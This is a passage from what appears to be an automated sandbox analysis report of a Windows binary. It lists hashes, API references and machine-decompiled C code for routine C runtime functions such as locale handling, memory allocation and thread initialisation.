                                        • Opcode ID: f1b5dea3613244f58a2e6143bac3bdcc1bc1737f7ab558a5f3c72a8425d1a790
                                        • Instruction ID: 55037b5f61b98b7ab115b077da11ff23c629134b0c359b20dc8f913433ebceba
                                        • Opcode Fuzzy Hash: f1b5dea3613244f58a2e6143bac3bdcc1bc1737f7ab558a5f3c72a8425d1a790
                                        • Instruction Fuzzy Hash: 98217E72B061538FEF609F24FD809A9B7E5AB06B213350039EC14A7266DF388D44EB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E00098E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t12;
                                        				intOrPtr _t13;
                                        				intOrPtr _t15;
                                        				intOrPtr _t22;
                                        				intOrPtr* _t42;
                                        
                                        				if(_a4 > 5 || _a8 == 0) {
                                        					L4:
                                        					return 0;
                                        				} else {
                                        					_t42 = E000932EE(8, 1);
                                        					_t48 = _t42;
                                        					if(_t42 != 0) {
                                        						_t12 = E000932EE(0xb8, 1);
                                        						 *_t42 = _t12;
                                        						__eflags = _t12;
                                        						if(_t12 != 0) {
                                        							_t13 = E000932EE(0x220, 1);
                                        							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                        							__eflags = _t13;
                                        							if(_t13 != 0) {
                                        								E0009899A( *_t42, 0xae2e8);
                                        								_t15 = E00099285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								__eflags = _t15;
                                        								if(__eflags == 0) {
                                        									L14:
                                        									E000932B6();
                                        									E0009363B( *_t42);
                                        									E000934E1( *_t42);
                                        									E000932B6(_t42);
                                        									_t42 = 0;
                                        									L16:
                                        									return _t42;
                                        								}
                                        								_push( *((intOrPtr*)( *_t42 + 4)));
                                        								_t22 = E00093D75(__edx, 1, __eflags);
                                        								__eflags = _t22;
                                        								if(_t22 == 0) {
                                        									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                        									goto L16;
                                        								}
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								goto L14;
                                        							}
                                        							E000932B6( *_t42);
                                        							E000932B6(_t42);
                                        							L8:
                                        							goto L3;
                                        						}
                                        						E000932B6(_t42);
                                        						goto L8;
                                        					}
                                        					L3:
                                        					 *((intOrPtr*)(E00094196(_t48))) = 0xc;
                                        					goto L4;
                                        				}
                                        			}












                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 1503006713-0
                                        • Opcode ID: 620447d826ed4e0eb0b49abdffd8f129432ae38556badfaaeb61fad8a4326c2f
                                        • Instruction ID: b97cb3ffaf5d7643bf12991928e3b030b4792723ad36ee483a36947f184643f8
                                        • Opcode Fuzzy Hash: 620447d826ed4e0eb0b49abdffd8f129432ae38556badfaaeb61fad8a4326c2f
                                        • Instruction Fuzzy Hash: E221A835104611EAEF717F65DC12E9BBBE5DF43750B108429F448592A3EF328910FB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E00098F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                        				signed int _v8;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				signed int _v40;
                                        				void* _t38;
                                        				signed int _t45;
                                        				signed int _t60;
                                        				intOrPtr _t77;
                                        				void* _t80;
                                        				intOrPtr* _t82;
                                        				signed int _t83;
                                        				signed int _t86;
                                        				intOrPtr _t88;
                                        				void* _t92;
                                        
                                        				_t80 = __edx;
                                        				_push(__ebx);
                                        				_push(__esi);
                                        				_t86 = 0;
                                        				if(_a12 <= 0) {
                                        					L5:
                                        					return _t38;
                                        				} else {
                                        					_push(__edi);
                                        					_t82 =  &_a12;
                                        					while(1) {
                                        						_t82 = _t82 + 4;
                                        						_t38 = E0009551B(_a4, _a8,  *_t82);
                                        						_t92 = _t92 + 0xc;
                                        						if(_t38 != 0) {
                                        							break;
                                        						}
                                        						_t86 = _t86 + 1;
                                        						if(_t86 < _a12) {
                                        							continue;
                                        						} else {
                                        							goto L5;
                                        						}
                                        						goto L20;
                                        					}
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					E00094112(0, _t80);
                                        					asm("int3");
                                        					_push(0x14);
                                        					_push(0xacf88);
                                        					E000927F0(0, _t82, _t86);
                                        					_t66 = 0;
                                        					_v32 = 0;
                                        					__eflags = _a4 - 5;
                                        					if(__eflags <= 0) {
                                        						_t88 = E000915FE();
                                        						_v36 = _t88;
                                        						E000936DB(0, _t80, _t82, _t88, __eflags);
                                        						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                        						_v8 = _v8 & 0;
                                        						_t83 = E000932EE(0xb8, 1);
                                        						_v40 = _t83;
                                        						__eflags = _t83;
                                        						if(_t83 != 0) {
                                        							E00093117(0xc);
                                        							_v8 = 1;
                                        							E0009899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                        							_v8 = _v8 & 0x00000000;
                                        							E000990D1();
                                        							_t66 = E00099285(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                        							_v32 = _t66;
                                        							__eflags = _t66;
                                        							if(_t66 == 0) {
                                        								E0009363B(_t83);
                                        								_t43 = E000934E1(_t83);
                                        							} else {
                                        								__eflags = _a8;
                                        								if(_a8 != 0) {
                                        									_t60 = E0009DB06(_a8, 0xae17c);
                                        									__eflags = _t60;
                                        									if(_t60 != 0) {
                                        										 *0xf0a44 = 1;
                                        									}
                                        								}
                                        								E00093117(0xc);
                                        								_v8 = 2;
                                        								_t25 = _t88 + 0x6c; // 0x6c
                                        								E0009375B(_t25, _t83);
                                        								E0009363B(_t83);
                                        								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                        								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                        									__eflags =  *0xaecf4 & 0x00000001;
                                        									if(( *0xaecf4 & 0x00000001) == 0) {
                                        										E0009375B("��",  *((intOrPtr*)(_t88 + 0x6c)));
                                        										_t77 =  *0xae2e4; // 0xae2e8
                                        										_t32 = _t77 + 0x84; // 0xaed00
                                        										 *0xaecf8 =  *_t32;
                                        										_t33 = _t77 + 0x90; // 0xa9570
                                        										 *0xaed54 =  *_t33;
                                        										_t34 = _t77 + 0x74; // 0x1
                                        										 *0xae178 =  *_t34;
                                        									}
                                        								}
                                        								_v8 = _v8 & 0x00000000;
                                        								_t43 = E000990E0();
                                        							}
                                        						}
                                        						_v8 = 0xfffffffe;
                                        						E00099113(_t43, _t88);
                                        						_t45 = _t66;
                                        					} else {
                                        						 *((intOrPtr*)(E00094196(__eflags))) = 0x16;
                                        						E000940E7();
                                        						_t45 = 0;
                                        					}
                                        					return E00092835(_t45);
                                        				}
                                        				L20:
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 790675137-2599400749
                                        • Opcode ID: 96057e90ca0431be5a46350261f82ec6f038a27f70e7c8780814232b96e4b257
                                        • Instruction ID: 34fa5f32ff1382576646ec1ec41aad014c6188766e5efbf1e73dae29dbb38186
                                        • Opcode Fuzzy Hash: 96057e90ca0431be5a46350261f82ec6f038a27f70e7c8780814232b96e4b257
                                        • Instruction Fuzzy Hash: E941C132504305AFDF20AFA8DD82BDD7BE5AF45314F10842DFA1896293DB768641EB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E000917CB(void* __edx, char* _a4, short* _a8) {
                                        				int _v8;
                                        				void* __ecx;
                                        				intOrPtr* _t7;
                                        				intOrPtr _t9;
                                        				short* _t10;
                                        				short* _t12;
                                        				short* _t14;
                                        				int _t15;
                                        				short* _t22;
                                        				int _t24;
                                        				void* _t27;
                                        				void* _t31;
                                        				short* _t33;
                                        				intOrPtr _t34;
                                        
                                        				_t31 = __edx;
                                        				_push(_t27);
                                        				_t24 = 0;
                                        				_t36 = _a4;
                                        				if(_a4 != 0) {
                                        					_t33 = _a8;
                                        					__eflags = _t33;
                                        					if(__eflags == 0) {
                                        						goto L1;
                                        					}
                                        					_t10 = E00092D64(_t27);
                                        					__eflags = _t10;
                                        					if(_t10 == 0) {
                                        						_t22 = AreFileApisANSI();
                                        						__eflags = _t22;
                                        						if(_t22 == 0) {
                                        							_t24 = 1;
                                        							__eflags = 1;
                                        						}
                                        					}
                                        					 *_t33 = 0;
                                        					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
                                        					_v8 = _t12;
                                        					__eflags = _t12;
                                        					if(_t12 != 0) {
                                        						_t14 = E00093336(_t31, _t12 + _t12);
                                        						 *_t33 = _t14;
                                        						__eflags = _t14;
                                        						if(_t14 == 0) {
                                        							goto L9;
                                        						}
                                        						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
                                        						__eflags = _t15;
                                        						if(_t15 != 0) {
                                        							_t9 = 1;
                                        							__eflags = 1;
                                        							goto L14;
                                        						}
                                        						E00094175(GetLastError());
                                        						E000932B6( *_t33);
                                        						 *_t33 =  *_t33 & 0x00000000;
                                        						goto L8;
                                        					} else {
                                        						E00094175(GetLastError());
                                        						L8:
                                        						L9:
                                        						_t9 = 0;
                                        						L14:
                                        						return _t9;
                                        					}
                                        				}
                                        				L1:
                                        				_t7 = E00094196(_t36);
                                        				_t34 = 0x16;
                                        				 *_t7 = _t34;
                                        				E000940E7();
                                        				_t9 = _t34;
                                        				goto L14;
                                        			}

                                        APIs
                                        • ___crtIsPackagedApp.LIBCMT ref: 000917F5
                                        • AreFileApisANSI.KERNEL32 ref: 000917FE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00091818
                                        • GetLastError.KERNEL32 ref: 00091825
                                        • __dosmaperr.LIBCMT ref: 0009182C
                                          • Part of subcall function 00094196: __getptd_noexit.LIBCMT ref: 00094196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                        • String ID:
                                        • API String ID: 1083238821-0
                                        • Opcode ID: c3c277f0404f2e6dcc4893b4301a4623c80ff8c853f5cab2e5fa7c087b45cab1
                                        • Instruction ID: 024ed592de540ba5a6cdae41f488b0d52b33d50c810ab537c6bc44784393a71c
                                        • Opcode Fuzzy Hash: c3c277f0404f2e6dcc4893b4301a4623c80ff8c853f5cab2e5fa7c087b45cab1
                                        • Instruction Fuzzy Hash: 34118EB2604206BFEF606FB09C08EEBB6ECEF05761B208528F951D5192EE30C841B760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E00091738(void* __ebx, void* __edi, void* __eflags) {
                                        				void* __esi;
                                        				void* _t3;
                                        				intOrPtr _t6;
                                        				long _t14;
                                        				long* _t27;
                                        
                                        				E00091BC7(_t3);
                                        				if(E00093268() != 0) {
                                        					_t6 = E00092BEF(E00091493);
                                        					 *0xae000 = _t6;
                                        					__eflags = _t6 - 0xffffffff;
                                        					if(_t6 == 0xffffffff) {
                                        						goto L1;
                                        					} else {
                                        						_t27 = E000932EE(1, 0x3bc);
                                        						__eflags = _t27;
                                        						if(_t27 == 0) {
                                        							L6:
                                        							E000917AE();
                                        							__eflags = 0;
                                        							return 0;
                                        						} else {
                                        							__eflags = E00092C4B( *0xae000, _t27);
                                        							if(__eflags == 0) {
                                        								goto L6;
                                        							} else {
                                        								_push(0);
                                        								_push(_t27);
                                        								E00091685(__ebx, __edi, _t27, __eflags);
                                        								_t14 = GetCurrentThreadId();
                                        								_t27[1] = _t27[1] | 0xffffffff;
                                        								 *_t27 = _t14;
                                        								__eflags = 1;
                                        								return 1;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					L1:
                                        					E000917AE();
                                        					return 0;
                                        				}
                                        			}

                                        APIs
                                        • __init_pointers.LIBCMT ref: 00091738
                                          • Part of subcall function 00091BC7: RtlEncodePointer.NTDLL(00000000,?,0009173D,0009112C,000ACCC0,00000014), ref: 00091BCA
                                          • Part of subcall function 00091BC7: __initp_misc_winsig.LIBCMT ref: 00091BE5
                                          • Part of subcall function 00091BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00092DAE
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00092DC2
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00092DD5
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00092DE8
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00092DFB
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00092E0E
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00092E21
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00092E34
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00092E47
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00092E5A
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00092E6D
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00092E80
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00092E93
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00092EA6
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00092EB9
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00092ECC
                                        • __mtinitlocks.LIBCMT ref: 0009173D
                                        • __mtterm.LIBCMT ref: 00091746
                                          • Part of subcall function 000917AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0009174B,0009112C,000ACCC0,00000014), ref: 00093182
                                          • Part of subcall function 000917AE: _free.LIBCMT ref: 00093189
                                          • Part of subcall function 000917AE: DeleteCriticalSection.KERNEL32(000AE058,?,?,0009174B,0009112C,000ACCC0,00000014), ref: 000931AB
                                        • __calloc_crt.LIBCMT ref: 0009176B
                                        • __initptd.LIBCMT ref: 0009178D
                                        • GetCurrentThreadId.KERNEL32 ref: 00091794
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 3567560977-0
                                        • Opcode ID: c48206ffb8bc8d9e264b49cfce2bbd915112893e8e746e359e8769a7c92b4387
                                        • Instruction ID: f523af66e95df6526ad77a22eabbf74b38ed8b487b10ca64d22ad3eb7b9f47ce
                                        • Opcode Fuzzy Hash: c48206ffb8bc8d9e264b49cfce2bbd915112893e8e746e359e8769a7c92b4387
                                        • Instruction Fuzzy Hash: 14F06D32B1C7132DFE747BB4AC076CA66E59F42730B200A2AF450C80E2FF108841A554
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0009879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t10;
                                        				signed int _t12;
                                        				intOrPtr* _t16;
                                        				intOrPtr* _t31;
                                        				void* _t32;
                                        
                                        				_push(8);
                                        				_push(0xacf60);
                                        				_t10 = E000927F0(__ebx, __edi, __esi);
                                        				_t31 =  *((intOrPtr*)(_t32 + 8));
                                        				if(_t31 != 0) {
                                        					_t12 = E00093117(0xd);
                                        					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                        					if( *((intOrPtr*)(_t31 + 4)) != 0) {
                                        						asm("lock xadd [ecx], eax");
                                        						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0xae5b0) {
                                        							E000932B6( *((intOrPtr*)(_t31 + 4)));
                                        						}
                                        					}
                                        					 *(_t32 - 4) = 0xfffffffe;
                                        					E00098DC1();
                                        					if( *_t31 != 0) {
                                        						E00093117(0xc);
                                        						 *(_t32 - 4) = 1;
                                        						E0009363B( *_t31);
                                        						_t16 =  *_t31;
                                        						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0xae2e8) {
                                        							E000934E1(_t16);
                                        						}
                                        						 *(_t32 - 4) = 0xfffffffe;
                                        						E00098DCD();
                                        					}
                                        					_t10 = E000932B6(_t31);
                                        				}
                                        				return E00092835(_t10);
                                        			}









                                        APIs
                                        • __lock.LIBCMT ref: 00098D38
                                          • Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
                                          • Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
                                          • Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142
                                        • _free.LIBCMT ref: 00098D5E
                                          • Part of subcall function 000932B6: HeapFree.KERNEL32(00000000,00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932CA
                                          • Part of subcall function 000932B6: GetLastError.KERNEL32(00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932DC
                                        • __lock.LIBCMT ref: 00098D77
                                        • ___removelocaleref.LIBCMT ref: 00098D86
                                        • ___freetlocinfo.LIBCMT ref: 00098D9F
                                        • _free.LIBCMT ref: 00098DB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                        • String ID:
                                        • API String ID: 626533743-0
                                        • Opcode ID: 1e448fa958a5f00f155cebfdd84c875f69fa7854ada8d6ffe4d2348423fda6f9
                                        • Instruction ID: fbce04c7524830cdfee10fd8e8e1933519bdb381f3d3d7d163f2479a600d110c
                                        • Opcode Fuzzy Hash: 1e448fa958a5f00f155cebfdd84c875f69fa7854ada8d6ffe4d2348423fda6f9
                                        • Instruction Fuzzy Hash: DD019231507700EAEFB8ABA4D806799B3E05F12721F24851DF4A4663D2DF748A80FB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16
                                        • String ID:
                                        • API String ID: 3509577899-0
                                        • Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction ID: fbc4c938a06a13d33bb0ed137483eae0ef2289e907fc995bfa770250c3fd1d11
                                        • Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction Fuzzy Hash: B151AF72604216ABDB258F64CC81EFF7BBAEF84790F154668FD09E6181EB34DC40D6A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E000959FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                        				void* _t7;
                                        				long _t8;
                                        				intOrPtr* _t9;
                                        				intOrPtr* _t12;
                                        				long _t20;
                                        				long _t31;
                                        
                                        				if(_a4 != 0) {
                                        					_t31 = _a8;
                                        					__eflags = _t31;
                                        					if(_t31 != 0) {
                                        						_push(__ebx);
                                        						while(1) {
                                        							__eflags = _t31 - 0xffffffe0;
                                        							if(_t31 > 0xffffffe0) {
                                        								break;
                                        							}
                                        							__eflags = _t31;
                                        							if(_t31 == 0) {
                                        								_t31 = _t31 + 1;
                                        								__eflags = _t31;
                                        							}
                                        							_t7 = HeapReAlloc( *0xefd1c, 0, _a4, _t31);
                                        							_t20 = _t7;
                                        							__eflags = _t20;
                                        							if(_t20 != 0) {
                                        								L17:
                                        								_t8 = _t20;
                                        							} else {
                                        								__eflags =  *0xf0a40 - _t7;
                                        								if(__eflags == 0) {
                                        									_t9 = E00094196(__eflags);
                                        									 *_t9 = E000941EF(GetLastError());
                                        									goto L17;
                                        								} else {
                                        									__eflags = E0009455B(_t7, _t31);
                                        									if(__eflags == 0) {
                                        										_t12 = E00094196(__eflags);
                                        										 *_t12 = E000941EF(GetLastError());
                                        										L12:
                                        										_t8 = 0;
                                        										__eflags = 0;
                                        									} else {
                                        										continue;
                                        									}
                                        								}
                                        							}
                                        							goto L14;
                                        						}
                                        						E0009455B(_t6, _t31);
                                        						 *((intOrPtr*)(E00094196(__eflags))) = 0xc;
                                        						goto L12;
                                        					} else {
                                        						E000932B6(_a4);
                                        						_t8 = 0;
                                        					}
                                        					L14:
                                        					return _t8;
                                        				} else {
                                        					return E0009596C(__ebx, __edx, __edi, _a8);
                                        				}
                                        			}










                                        APIs
                                        • _malloc.LIBCMT ref: 00095A0A
                                          • Part of subcall function 0009596C: __FF_MSGBANNER.LIBCMT ref: 00095983
                                          • Part of subcall function 0009596C: __NMSG_WRITE.LIBCMT ref: 0009598A
                                          • Part of subcall function 0009596C: HeapAlloc.KERNEL32(007C0000,00000000,00000001,00000000,00000000,00000000,?,0009334C,00000000,00000000,00000000,00000000,?,00093201,00000018,000ACDB0), ref: 000959AF
                                        • _free.LIBCMT ref: 00095A1D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap_free_malloc
                                        • String ID:
                                        • API String ID: 2734353464-0
                                        • Opcode ID: dd909db95a92bd5af9694876447f1d933b4fdd946849ecf6ab766cd93eccd6cc
                                        • Instruction ID: 1553e9ff81819ab1d4e1e770a093666b30eab558416d13de368e2a317615a408
                                        • Opcode Fuzzy Hash: dd909db95a92bd5af9694876447f1d933b4fdd946849ecf6ab766cd93eccd6cc
                                        • Instruction Fuzzy Hash: 5F115C31404E11AFDF726F71AC45EAE37D4AF14362F104625F9099A153EF348D41B799
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0009F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				int _v20;
                                        				int _t35;
                                        				int _t38;
                                        				intOrPtr* _t44;
                                        				int _t47;
                                        				short* _t49;
                                        				intOrPtr _t50;
                                        				intOrPtr _t54;
                                        				int _t55;
                                        				int _t59;
                                        				char* _t62;
                                        
                                        				_t62 = _a8;
                                        				if(_t62 == 0) {
                                        					L5:
                                        					return 0;
                                        				}
                                        				_t50 = _a12;
                                        				if(_t50 == 0) {
                                        					goto L5;
                                        				}
                                        				if( *_t62 != 0) {
                                        					E000937C4( &_v20, _a16);
                                        					_t35 = _v20;
                                        					__eflags =  *(_t35 + 0xa8);
                                        					if( *(_t35 + 0xa8) != 0) {
                                        						_t38 = E0009F121( *_t62 & 0x000000ff,  &_v20);
                                        						__eflags = _t38;
                                        						if(_t38 == 0) {
                                        							__eflags = _a4;
                                        							_t59 = 1;
                                        							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                        							if(__eflags != 0) {
                                        								L21:
                                        								__eflags = _v8;
                                        								if(_v8 != 0) {
                                        									_t54 = _v12;
                                        									_t31 = _t54 + 0x70;
                                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                        									__eflags =  *_t31;
                                        								}
                                        								return _t59;
                                        							}
                                        							L20:
                                        							_t44 = E00094196(__eflags);
                                        							_t59 = _t59 | 0xffffffff;
                                        							__eflags = _t59;
                                        							 *_t44 = 0x2a;
                                        							goto L21;
                                        						}
                                        						_t59 = _v20;
                                        						__eflags =  *(_t59 + 0x74) - 1;
                                        						if( *(_t59 + 0x74) <= 1) {
                                        							L15:
                                        							__eflags = _t50 -  *(_t59 + 0x74);
                                        							L16:
                                        							if(__eflags < 0) {
                                        								goto L20;
                                        							}
                                        							__eflags = _t62[1];
                                        							if(__eflags == 0) {
                                        								goto L20;
                                        							}
                                        							L18:
                                        							_t59 =  *(_t59 + 0x74);
                                        							goto L21;
                                        						}
                                        						__eflags = _t50 -  *(_t59 + 0x74);
                                        						if(__eflags < 0) {
                                        							goto L16;
                                        						}
                                        						__eflags = _a4;
                                        						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                        						_t59 = _v20;
                                        						__eflags = _t47;
                                        						if(_t47 != 0) {
                                        							goto L18;
                                        						}
                                        						goto L15;
                                        					}
                                        					_t55 = _a4;
                                        					__eflags = _t55;
                                        					if(_t55 != 0) {
                                        						 *_t55 =  *_t62 & 0x000000ff;
                                        					}
                                        					_t59 = 1;
                                        					goto L21;
                                        				}
                                        				_t49 = _a4;
